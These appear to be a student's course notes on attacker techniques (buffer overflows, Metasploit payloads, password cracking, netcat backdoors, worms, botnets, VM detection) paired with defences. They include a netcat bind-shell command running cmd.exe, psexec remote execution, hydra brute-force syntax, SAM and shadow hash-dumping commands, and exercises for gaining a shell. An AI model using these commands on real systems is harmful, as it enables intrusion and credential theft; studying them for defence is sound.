apply for Sniffing and Spoofing Identification Users might report that they lose sessions Error messages from ssh that server keys are changed Erradication Check for rootkit and change the passwords DNS Cache Poisoning >> Search << Bufferover flows SANS_3B – 50:00 Stack Based Buffer Overflow This can be exploited when input sanitization and input checking is not performed on the Application. When a function call is made, The execution stops and the address is stored on stack so as to resume after completing the calling function.[Return PTR] Current State of Registers is stored as Saved Frame PTR In the Function Program memory for the variables are allocated and stored in the Stack Buffer. Suppose Input is more than what variable can hold, the input data overflows and overwrites the Return PTR. Now when function completed and original program is resumed, It loads the value in Return PTR which is Overwritten due to malicious input. Usually the value in Return Ptr is loaded with the address in Stack which hold Malicious Shell Code Culprit: Input Bound Checking 1. Identify the buffer size, exactly speaking identify the location of EIP Input a pattern of input which is so long, when the application crashes, look into technical information – if the segmentation fault caused to trying to access a location which is the input sequence we have applied, like wise identify the location of EIP. [Bruteforce Fuzzing] 2. Exploit is tailored to operating system and architecture 3. If the exploit it large so that it do not fit into, then split the exploit. Eg:, part of the exploit is one field, and remaining in another field. After overflow of one field, in shell code put a JMP to the code in another field. 4. One more method is Staged Loading: A small exploit is running, one came to end of the code it fetches next exploit data and load into same space and run again. 5. If you are not sure the exact location of exploit code, Use NOP NOP NOP NOP <EXPLOIT>. Now even the return pointer goes to NOP, it will follow and finally runs the Exploit. Sploit MetaSploit Exploit: It is it that triggers the condition so that we can execute the code Payload: The actual code that executes, it can be a machine code of Shell, some command to add another user etc It has an arsenal of exploits. Metasploit offers a huge set of payloads, that is, the code the attacker wants to run on the target machine, triggered by the exploit itself. An attacker using Metasploit can choose from any of the following payloads to foist on a target: Bind shell to current port. This payload opens a command shell listener on the target machine using the existing TCP connection of a service on the machine. The attacker can then feed commands to the victim system across the network to execute at a command prompt. Bind shell to arbitrary port. This payload opens a command shell listener on any TCP port of the attacker's choosing on the target system. Reverse shell. This payload shovels a shell back to the attacker on a TCP port. With this capability, the attacker can force the victim machine to initiate an outbound connection, sent to the attacker, polling the bad guy for commands to be executed on the victim machine. So, if a network or host-based firewall blocks inbound connections to the victim machine, the attacker can still force an outbound connection from the victim to the attacker, getting commands from the attacker for the shell to execute. As we discuss in Chapter 8, Phase 3: Gaining Access Using Network Attacks, the attacker will likely have a Netcat listener waiting to receive the shoveled shell. Windows VNC Server DLL Inject. This payload allows the attacker to control the GUI of the victim machine remotely, using the Virtual Network Computing (VNC) tool sent as a payload. VNC runs inside the victim process, so it doesn't need to be installed on the victim machine in advance. Instead, it is inserted as a DLL inside the vulnerable program to give the attacker remote control of the machine's screen and keyboard. Reverse VNC DLL Inject. This payload inserts VNC as a DLL inside the running process, and then tells the VNC server to make a connection back to the attacker's machine, in effect shoveling the GUI to the attacker. That way, the victim machine initiates an outbound connection to the attacker, but allows the attacker to control the victim machine. Inject DLL into running application. This payload injects an arbitrary DLL of the attacker's choosing into the vulnerable process, and creates a thread to run inside that DLL. Thus, the attacker can make any blob of code packaged as a DLL run on the victim. Create Local Admin User. This payload creates a new user in the administrators group with a name and password specified by the attacker The Meterpreter. This general-purpose payload carries a very special DLL to the target box. This DLL implements a simple shell, called the Metasploit Interpreter o It does not create a new process, just runs inside the vulnerable app No Detection. o It doesn’t touch hard drive No Evidence o Although vulnerable application has limited access restrictions, Meterpreters commands have full previlegies Great control to Attacker PRIV is an extension that is injected which has bunch of privilege escalation attacks, that can cause privilege escalation, so that even the user with limited privileges is exploited, attacker can run commands with admin privileges. Meterpreter 3 Polymorphic Code –used to avoid detection of signatures by AV o XOR – the exploit code with a key o Randomized No OP Generator – Use the functional equivalents of code that does nothing e.g: multiplying AH with 1, Adding 0 to CX etc., at various places of exploit code to evade detection Exercise: 1. Most Machines have TFTP Client on it. So exploit the target machine and get a little shell on it. 2. On shell, execute Get NetCat using TFTP. 3. Use Firewalk to identify which packets are allowed and use corresponding mechanism to transfer files. [some firewalls block outgoing tftp port, then use ftp, if not use ssh] 4. Use Binding the shell or Reverse Shell to take control Defending Apply Patches Use HIPS o They observe syscalls o Look into memory – look for strange jumps Non Executable Stacks o On Windows, uses DEP (Data Execution Prevention) o On Solaris, By default o On Linux, there are patches by “Solar Designer” Attacker: Ok.. No Problem..i will use functions which are in libc, ntdll.dll to workout malicious activity… I am just using those functional components which are necessary and allowed under application. – Return to glibc, Return to NTDll Use StackShield: Stack Shield is a tool for adding protection to programs from this kind of attacks at compile time whitout changing a line of code. Stack Shield uses a more secure protection system than other tool like Immunix Stack Guard. Stack Shield is designed to support the GCC under a Linux Intel 386 class platform. Avoid Programming Errors Use Static Code Analysis Tools Parser Vulnerabilities IDS/IPS parses the datapackets to analyze and proceed through. There are some maliciously crafted packets which when parsed by IDS/IPS causes buffer overflow and thus causes IDS to blind. I.e., to the management it shows No suspicious packets (but actually not detecting it) FileParsers are also causes bufferoverflow when opened a maliciously crafted file. Eg., when you open a JPEG file, it executes malicious code. Format String Attacks C:\Mahesh\Tools\NetCat>sort %x%x%x 7c812fd900The system cannot find the file specified. 7c812fd900 is the value on the stack. %x reads and prints 4 bytes from stack o this may leak sensitive data %n writes the number of characters printed so far onto the stack o this allow stack overflow attacks... C format strings break the “don’t mix data & code” principle. Easy to spot & fix: o replace printf(str) by printf(“%s”, str) >>>Checkout formatflaw.c<<< >>>Some Exercises in last 20 mins<<< Day 4 User Input Sanitization is the major culprit of these attacks such as buffer overlow, format sting attacks, sql injections etc., If the application is prone to such attacks, Attacker can inject a command shell to carry out further attacks. Eg: Exploiting Unicode Vulnerability in Windows IIS Password cracking Password Crack resources: http://www.skullsecurity.org/wiki/index.php/Passwords Default Passwords: http://www.phenoelit-us.org/dpl/dpl.html Password Guessing: Hydra: http://freeworld.thc.org/thc-hydra/ It supports many protocols Telnet, FTP, HTTP, HTTPS, HTTP-PROXY, LDAP, SMB, SMBNT, MS-SQL, MYSQL, REXEC, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, ICQ, SAP/R3, Cisco auth, Cisco enable, and Cisco AAA #hydra –l <user> -P <passworddictionary> -v <target> <protocol> In the above it is bruteforcing 192.168.0.112 for user ftp with the list of passwords stored in passwords.txt It is time-consuming and resource intensive They generate IDS Alerts Usually machines are configured to Account Lockouts after multiple login failures It can also be used as DOS Attack Password Cracking: Passwords are stored in either encrypted form or Hash (or Message Digest) on the machine that is used to authenticate the user before logging in. Hybrid Password Cracking- the password-cracking tool starts guessing passwords using a dictionary term. Then, it creates other guesses by appending or prepending characters to the dictionary term. By methodically adding characters to words in a brute-force fashion. Password Cracking for a botnet owner would be faily easy and simple. Cain, a fantastic free tool available from Massimiliano Montoro at www.oxid.it/cain.html John the Ripper, a powerful free password cracker for UNIX/Linux and some Windows passwords, written by Solar Designer, available at www.openwall.com/john Pandora, a tool for testing Novell Netware, including password cracking, written by Simple Nomad, and available at www.nmrc.org/project/pandora LC5, the latest incarnation of the venerable L0phtCrack password cracker, an easy-to-use but rather expensive commercial password cracker at www.atstake.com/products/lc/purchase.html CAIN: Its not just password cracker, it is a multitude of tools. WLAN discovery like Netstumbler Identify if the target is sniffing packets Network Discovery Captures intresting Packets on network containing user ids etc A tool to dump and reveal all encrypted or hashed passwords cached on the local machine, including the standard Windows LM and NT password representations, as well as the application-specific passwords for Microsoft Outlook, Outlook Express, Outlook Express Identities, Outlook 2002, Microsoft Internet Explorer, and MSN Explorer. An ARP cache poisoning tool, which can be used to redirect traffic on a LAN so that an attacker can more easily sniff in a switched environment A remote command shell, rather like the backdoor command shells A remote route table manager, so an administrator can tweak the packet routing rules on a Windows machine. A remote TCP/UDP port viewer that lists local ports listening on the system running Abel, rather like the Active Ports and TCPView tools. A remote Windows password hash dumper, which an attacker can use to retrieve the encrypted and hashed Windows password representations from the Security Accounts Manager (SAM) Password Cracking On Windows 1. Retreive the LM Hash and NTLM Hash from SAM Database 2. Use Cain to crack it. Retreiving Hashes C:\Windows\repair\sam._ [original SAM file cannot be opened/copied] Cain can retrieve LM / NTLM Hashes from Challenged Packets on network. whenever anyone authenticates to the domain or tries to access a share, the attacker can run Cain in sniffing mode to snag user authentication information from the network. So attacker can entice the victim to make such authentication eg: sending a mail to open a shared drive which needs authentication etc., It also supports Rainbow Tables. Rainbow Tables - A rainbow table is a lookup table of pre computed hashes that can be matched with hash that needs to be cracked. It helps recovering plaintext passwords. Salts make it difficult to crack using Rainbow tables. Usually they are 64 bit in most systems. Unfortunately salt not used for windows NTLM hashes. Samdump2 To retrieve these hashes from a windows machine, Boot from a Linux and mount the C:\ and dump the SAM Database. [root@~]#samdump2 /mnt/CPrimary/Windows/system32/config/SYSTEM / mnt/CPrimary/Windows/system32/config/SAM > samdb.txt NOTE: SYSTEM should be dumped prior to dumping SAM, since if syskey is enabled, the SAM db is encrypted and it is stored in SYSTEM hive. John The Ripper A superb professional password cracking tool On Linux, Retriving Hashes /etc/passwd In some linuxes, Hashes are stored in /etc/shadow (or /etc/secure) #./unshadow <passwd file> <shadow file> > output.txt To grab a copy of a shadow password file, an attacker must find a root-level exploit, such as a buffer overflow of program that runs as root or a related technique, to gain root access. After achieving root-level access, the attacker makes a copy of the shadow password file to crack. Defenses: Strong Password Policy o Use alpha numeric, case, numbers o Password Expiry after 30,60 or 90 days o Use Password Filtering Softwares on the AD Server during account creation and password modification Password Guardian, a commercial tool www.georgiasoftworks.com Strongpass, a free tool http://ntsecurity.nu/toolbox User Awareness Where Possible, Use Authentication Tools Other Than Passwords o Use RSA Tokens, Biometric access Protect Hashes o On Linux, active Password Shadowing. I.e., use /etc/shadow files which can be accessed only by root o On Windows, Disable LM Authentication Define HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash o Delete %systemroot%\repair\sam._ Exercise 1) create various accounts 2) combine password copy and shadow copy and retrieve 3) Look at john the ripper Password.lst 4) delete the accounts 5) shread the files, which will replace with 0s and 1s so that they are removed from harddisk blocks. ----------------- break ---------------------- Shell Access On Windows Scenerio: Attacker has an accound created on victim and use remote connection to open C$ of vitims machine. Now Attacker copies netcat on to the victims machine Now attacker runs Z:\>nc –l –p 1545 –e cmd.exe [Z: on attacker machine is C:\ on vitims machine] Result: Attacker created a netcat lister on himself :P LOL….. 1. Connect to remote machine with administrative session 2. Copy netcat and a Batch file that run Netcat which listens on to target machine. 3. Configure Task Scheduler to run the Batch file at \\computername time /interactive | /every:date,... /next:date,... command at \\computername id /delete | /delete/yes This will run netcat.bat everyday at 4:02 PM on the victim machine with SYSTEM Privileges. Now Netcat is listening on the victim machine. Alternately, 3. psexec from sysinternals is used to run executable on remote machines Z:\>psexec \\victimmachine –c netcat.bat Z:\>psexec \\victimmachine netcat.bat [copy the files] [Run the batch file] Run Regedit interactively in the System account to view the contents of the SAM and SECURITY keys:: psexec -i -d -s c:\windows\regedit.exe PSEXEC did not work out due to BlackIce which has blocked on the victim Machine. Defences Do not let attacker get Admin access to the machine Harden the ports net session shows up what sessions are present on the machine net start shows what services are running Disable Scheduling if not required. Containment Check the schedule tasks and delete it. Kill the services/process that are listening Erradication Identify the process and remove It Check for Rootkits, If present rebuild the machine Recovery Harden the machine based on preparation WORM A self replicating code that spreads across network. Each instance is called segment. They use vulnerabilities in applications, operating systems to spread across. Eg: Blaster worm uses buffer overflow vulnerability ins MS-RPC Dcom. From 2005, They started carrying bots which raise in botnets. Multi Exploits – Nimda worms have 12 to 15 multiple exploits (multiple ways) to break into the machine. Polymorphic worms – It recodes itself when it re-infects another machine to evade detection. 1. Encrypt the Original code of worm with Random Key (a simple XOR) 2. Generate short Decryptor for Key (PD) 3. This operation is done by Polymorphic Engine(PE) which is included with worm’s code. Open source Toolkit to Mutate Exploits – ADMMutate, CLET, and JempiScodes. They can place a Trojan, Backdoors which made raise of Botnet. Metamorphic Worms – It changes its functionality. It might download from C&C. Defences Bufferover flow protection Process for Rapid Patching Use HIDS, NIDS. Also Contact Network Management Personnel to identify Chokepoints at various places inside organization where you can place Filters. Encrypt your desktops, laptop with softwares like PointSec,so that even if bot gets in, it will not play with the data. Propagation: Emails, Browser exploits, Drive by downloads Mechanism for Botnet controls: IRC from Command & Control Server – Most Popular Mechanism Some Bots periodically login to some user on myspace, or some blogs to see the commands stored in it. Distributed P2P communication channels. Commands injected on one bot, remaining bots check for updates with its neighbor bots and takes the command and spreads thereafter. Now the problem with single C&C is resolved. Botnet becomes self-aware. Botnets Detecting Virtual Machines Since Virtual machines are used to analyse malwares, they detect that they are run in virtual machine and shuts its malicious activity. Check into memory artifacts – file system, Registry, and running process of the machine Redpill – o Executes instruction SIDT, It saves the address of Interrupt Descriptor Tables o If its running in Original machine, the address is in lower memory (< 0xd0) near operating system kernel. o If it is running in VM, the address value is higher Scoopy doo – SIDT. SGDT. SLDT SIDT – Store Interrupt Descriptor Table SGDT - Store Global Descriptor Table SLDT – Store Local Descriptor table o If these values are consistent with virtualization, You are virtualization Look for Virtualized Hardware o Look at MAC, Device Drivers, Interface VMDetect – It runs Instructions that only virtual machines executes and it results as invalid instruction when run on original machine. VMware Backdoor I/O Port Look for change in processor behavior that are associated with communications channel. Clock synchronization, Copy+paste, Drag Drop etc happens over this COM Channel. The following operation invokes Backdoor functions: /* in Intel syntax (MASM and most Windows based assemblers) */ MOV MOV MOV MOV EAX, EBX, CX, DX, 564D5868h command-specific-parameter backdoor-command-number 5658h IN EAX, DX (or OUT DX, EAX) /* magic number */ /* VMware I/O Port */ /* in AT&T syntax (gnu as and many unix based assemblers) */ movl movl movw movw $0x564D5868, %eax; command-specific-parameter, %ebx; backdoor-command-number, %cx; $0x5658, %dx; /* magic number */ /* VMware I/O port */ inl %dx, %eax; (or outl %eax, %dx) In appearance it is just a straight forward I/O access operation. Depending on the command number that was passed to EBX, different operations are carried out. Source Code ----------http://chitchat.at.infoseek.co.jp/vmware/backdoor.html